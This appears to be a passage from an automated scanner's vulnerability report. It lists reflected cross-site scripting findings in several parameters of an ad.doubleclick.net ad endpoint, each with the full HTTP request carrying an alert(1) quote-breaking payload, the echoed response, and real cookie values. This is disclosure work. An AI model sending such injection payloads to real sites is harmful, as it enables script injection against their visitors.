GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940ba5fc'-alert(1)-'19c8d83429c&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940ba5fc'-alert(1)-'19c8d83429c&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5
...[SNIP]...

3.394. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b8e"-alert(1)-"6acf202cf9 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940a5b8e"-alert(1)-"6acf202cf9&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4687

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940a5b8e"-alert(1)-"6acf202cf9&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5
...[SNIP]...

3.395. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a54c"-alert(1)-"c7a2c8d08c4 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236a54c"-alert(1)-"c7a2c8d08c4&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
v8/3af6/17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236a54c"-alert(1)-"c7a2c8d08c4&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&e
...[SNIP]...

3.396. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e4b8'-alert(1)-'0aa56bdd7f2 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236e4b8'-alert(1)-'0aa56bdd7f2&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
v8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=236e4b8'-alert(1)-'0aa56bdd7f2&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&e
...[SNIP]...

3.397. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26763"-alert(1)-"49e8dd20203 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=1862626763"-alert(1)-"49e8dd20203&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:36:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...

var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=1862626763"-alert(1)-"49e8dd20203&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.398. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 368d1'-alert(1)-'6067eb13c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626368d1'-alert(1)-'6067eb13c0&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4687

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
=\"_blank\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/149/%2a/k%3B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626368d1'-alert(1)-'6067eb13c0&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.399. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31927'-alert(1)-'3a122baa891 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.3931927'-alert(1)-'3a122baa891&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.3931927'-alert(1)-'3a122baa891&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435\">
...[SNIP]...

3.400. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec72f"-alert(1)-"ab1b11816da was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39ec72f"-alert(1)-"ab1b11816da&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39ec72f"-alert(1)-"ab1b11816da&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608435");
var wmode = "opaque";
var bg = "same as SWF";
va
...[SNIP]...

3.401. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70029"-alert(1)-"d5e6cc613b5 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=1470029"-alert(1)-"d5e6cc613b5&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=1470029"-alert(1)-"d5e6cc613b5&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27
...[SNIP]...

3.402. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd133'-alert(1)-'f173d93a6 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14fd133'-alert(1)-'f173d93a6&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:37:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/148/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Ess
...[SNIP]...
ick%3Bh%3Dv8/3af6/17/148/%2a/y%3B240046691%3B1-0%3B0%3B61212128%3B4307-300/250%3B41645535/41663322/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14fd133'-alert(1)-'f173d93a6&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27
...[SNIP]...

3.403. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5169f"-alert(1)-"c993156fbb2 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=05169f"-alert(1)-"c993156fbb2&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 2066

document.write('');

var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/g%3B240046691%3B2-0%3B0%3B61212128%3B4307-300/250%3B41645536/41663323/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=05169f"-alert(1)-"c993156fbb2&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/",
siteId: "794364
...[SNIP]...

3.404. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.22

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68b2'-alert(1)-'701c5fe0be3 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0f68b2'-alert(1)-'701c5fe0be3&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
